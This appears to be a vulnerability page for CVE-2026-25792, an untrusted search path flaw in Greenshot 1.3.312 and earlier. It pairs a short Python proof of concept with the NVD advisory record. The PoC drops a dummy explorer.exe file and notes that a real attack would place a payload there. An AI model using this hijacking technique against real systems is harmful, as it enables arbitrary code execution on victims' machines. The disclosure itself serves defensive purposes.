CVE-2026-25792

# Proof of Concept (PoC) for CVE-2026-25792 # This script demonstrates how to create a malicious executable # to exploit the untrusted search path vulnerability. import os # Simulate creating a malicious explorer.exe in the current directory # In a real attack, this would be a compiled binary payload. def create_malicious_exe(): malicious_filename = "explorer.exe" # In a real scenario, this file would contain shellcode or a payload # Here we create a dummy file for demonstration with open(malicious_filename, "wb") as f: f.write(b"This is a fake explorer.exe payload.") print(f"[+] Created malicious executable: {os.path.abspath(malicious_filename)}") print("[+] If Greenshot is launched from this directory and triggers the vuln, this file will execute.") if __name__ == "__main__": create_malicious_exe()

{"cve": {"id": "CVE-2026-25792", "sourceIdentifier": "[email protected]", "published": "2026-03-20T11:18:01.753", "lastModified": "2026-03-23T15:51:14.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Greenshot is an open source Windows screenshot utility. Versions 1.3.312 and below have untrusted executable search path / binary hijacking vulnerability that allows a local attacker to execute arbitrary code when the affected Windows application launches explorer.exe without using an absolute path. The vulnerable behavior is triggered when the user double-clicks the application’s tray icon, which opens the directory containing the most recent screenshot captured by the application. By placing a malicious executable with the same name in a location searched prior to the legitimate Windows binary, an attacker can gain code execution in the context of the application. This issue did not have a patch at the time of publication."}, {"lang": "es", "value": "Greenshot es una utilidad de captura de pantalla de código abierto para Windows. Las versiones 1.3.312 e inferiores tienen una vulnerabilidad de ruta de búsqueda de ejecutables no confiable / secuestro de binarios que permite a un atacante local ejecutar código arbitrario cuando la aplicación de Windows afectada inicia explorer.exe sin usar una ruta absoluta. El comportamiento vulnerable se activa cuando el usuario hace doble clic en el icono de la bandeja de la aplicación, lo que abre el directorio que contiene la captura de pantalla más reciente capturada por la aplicación. Al colocar un ejecutable malicioso con el mismo nombre en una ubicación buscada antes que el binario legítimo de Windows, un atacante puede obtener la ejecución de código en el contexto de la aplicación. Este problema no tenía un parche en el momento de la publicación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-426"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:getgreenshot:greenshot:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.3.312", "matchCriteriaId": "B340B100-847F-4824-9932-4C01557EFC42"}]}]}], "references": [{"url": "https://github.com/greenshot/greenshot/security/advisories/GHSA-f8v9-7fph-fr2j", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}